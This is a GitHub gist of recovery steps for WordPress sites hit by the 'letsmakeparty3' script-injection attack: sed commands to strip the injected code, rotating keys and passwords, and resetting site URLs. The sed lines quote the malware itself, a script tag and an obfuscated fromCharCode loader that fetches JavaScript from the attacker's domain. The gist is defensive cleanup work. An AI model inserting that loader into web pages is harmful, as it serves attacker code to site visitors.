Last active
December 12, 2020 18:33
-
-
Save fabmars/b5150358da81265e9d94bd9fbd6382c7 to your computer and use it in GitHub Desktop.
fix for letsmakeparty3 attack for those of you who have no backup !!!!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b | |
| Here's a how-to restore the site functionality (but not plug the hole wherebver it is) | |
| 1) download all files | |
| 2) fix altered files | |
| find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g' | |
| find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();</script>++g" | |
| find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g" | |
| 3) upload files overwriting if size is different (available setting in FZ) | |
| and check rights are back to 644 (probably 604 though) on those files | |
| 4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/ | |
| 5) change password in wp-config.php and change it in the DB too of course: SET PASSWORD = PASSWORD('mynewpassword'); | |
| 6) update <prefix>_options table and reset siteurl and home as they certainly also contain a link to the malicious site | |
| 7) Now you can access your WP again. Log in the wp admin console and change your password | |
| 7) Remove woocommerce and all unneeded plugins | |
| 8) Remove ability to post comments | |
| 9) Now let's find out how the joken entered the place |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment